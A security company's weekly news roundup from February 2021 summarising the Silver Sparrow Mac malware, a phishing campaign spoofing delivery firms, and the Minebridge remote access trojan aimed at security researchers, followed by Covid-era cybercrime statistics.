Cybersecurity Week in Review: 2/22/21
Posted by: GuidePoint Security
A mysterious attack on Mac computers, a phishing attack spoofing major shipping and delivery services companies, and a remote access trojan targeting security professionals are the focus of our news highlights from the last week.
Mac-based Malware Dubbed Silver Sparrow Discovered on 30K Machines
Last week, security researchers announced that they had discovered approximately 30,000 Macintosh computers infected with a malware they called “Silver Sparrow.” The Macs were located in 153 different countries, with the majority of infected machines found in the United States, United Kingdom, Canada, France, and Germany.
Researchers point out that what makes this malware unique is that it seems to target the newer Apple M1 binary chip, as well as the older Apple Intel chip. This particular malware also uses JavaScript (something not previously observed in MacOS malware) instead of ‘preinstall’ or ‘postinstall’ scripts to execute commands. Because JavaScript produces a different type of telemetry, it can be harder to detect malicious activity based on command-line arguments.
Currently, the malware’s purpose remains a mystery, as researchers did not observe the malware distributing a payload. Researchers also do not know how the malicious files were delivered to the users, although they suspect that malicious search engine results directed victims to download PKG files.
More on this story can be found here, here, and here.
Significant Phishing Attack Spoofs Shipping/Delivery Companies
Last week an estimated 10,000 business accounts were targeted in two fairly large phishing attacks. The attack involved spoofed emails from two major delivery service companies.
The purpose of the attack seems to be an attempt to steal business email account credentials from Microsoft email users.
According to researchers, in addition to brand impersonation, the phishing emails included social engineering and link redirects with sufficient content and design elements to potentially convince the target victims that the emails were real. The links took the targeted individuals to phishing pages hosted on Quip and Google Firebase. Researchers pointed out that this was particularly problematic, since both of these services are considered reputable, which could enable these malicious links to bypass security features.
Once on the phishing data collection page, the threat actors used an interesting technique of returning an error message if incorrect or ‘fake’ credentials were entered. Researchers surmise that the criminals designed this as either a back-end feature to validate email addresses or possibly as a way of collecting as many details and login options as possible, since a victim might assume they had mistyped their credentials or used the wrong one, and therefore would be willing to enter a different email/password combination.
The Covid-19 Connection
While this isn’t the first time that cybercriminals have spoofed delivery companies, it is notable that this fairly large phishing attack comes at a time when people are frequently using contactless delivery services to avoid the risks of in-person shopping.
Additional Details
More on the story can be found at these sources: 10K Microsoft Email Users Hit in Phishing Attack and 10K Targeted in Phishing Attacks.
Minebridge RAT Targeting Security Professionals
The remote access trojan (RAT) known as Minebridge has been given a makeover, and researchers believe it’s now targeting security researchers.
The updated version of the RAT has been altered to include a macro-based MSWord file. Should a target click on the file link, the Minebridge malware installs itself on a common remote desktop software (used by staff working in IT management and security)—which then gives the threat actors the opportunity to spy on victims or install additional malware. According to researchers, a number of the target victims are security researchers.
Sophisticated Social Engineering
During an analysis of the threat, researchers discovered that the email that delivered the malicious payload appears to come from a job candidate claiming threat intelligence analyst experience. The malware itself is embedded in an attached resume file. Should the recipient click on the file, macros are enabled which display the message “File successfully converted from PDF.” Then a decoy resume document appears.
The Minebridge malware then executes and drops a binary called defrender.exe—a legitimate application belonging to the remote desktop software and vulnerable to a type of attack known as dynamic link libraries (DLL) side loading. The newly installed msi.dll binary then proceeds to attempt to connect to a command-and-control server controlled by the threat actors.
Once installed, the malware has the ability to engage in a variety of activities including executing payloads, downloading files, deleting and updating files, and executing arbitrary shell commands.
Security researchers currently attribute the attack to an advanced persistent threat (APT) group known as TA505.
Another Covid Connection
The targeting of a popular remote desktop software by threat actors adds an additional interesting layer to the analysis. According to news reports, with the outbreak of the pandemic, orders for this particular software increased as more employees began remote work. While prior to the pandemic, remote work was limited to a few functions, now companies are adding and scaling software to enable all positions across the entire organization to work from home. In targeting this software for attack, threat actors seem to know that they are casting a wide net with a fairly good chance of reeling in a least a few victims.
Additional Information
More on the Minebridge RAT can be found here and here.
Final Words
Cybercriminals have become the proverbial “kid in the candy store” when it comes to leveraging the global Covid-19 pandemic for malicious purposes. Whether it is scam Covid vaccine websites (which we wrote about in this article) or taking advantage of the number of people shopping and working from home, there is no question that threat actors are leveraging every possible Covid angle for nefarious gain.
The statistics are unsettling. According to a July study, the Covid pandemic resulted in the number of unsecured remote desktop machines increasing by more than 40%. In addition, Covid can be linked to an incredibly large number of threats and cybercrime trends:
- Remote desktop protocol (RDP) attacks grew by 400% in just March and April of 2020.
- Email scams surged by 667% in the early pandemic months.
- Users are three times more likely to click on pandemic related phishing scams according to the Verizon 2020 Data Breach Investigations Report.
- An estimated 90% of newly created Covid/Coronavirus domains are scams.
- Over half a million Zoom account credentials are available on the dark web.
- There has been a 2000% increase in the number of malicious files distributed containing the word “zoom” in the file name.
- Ransomware has increased between 72% to 105% during Covid.
Unfortunately, these are just a few of the frightening statistics related to Covid threats and scams, and the trend isn’t likely to abate anytime soon.
If the Covid pandemic teaches us anything from a cybersecurity perspective, it is that many companies are woefully unprepared to manage security in large-scale business disruption events.
Cyberattacks that are the result of some major local, national, or global event are a known risk. Covid isn’t the first, and it won’t be the last. Businesses need to be prepared for it.
GuidePoint Security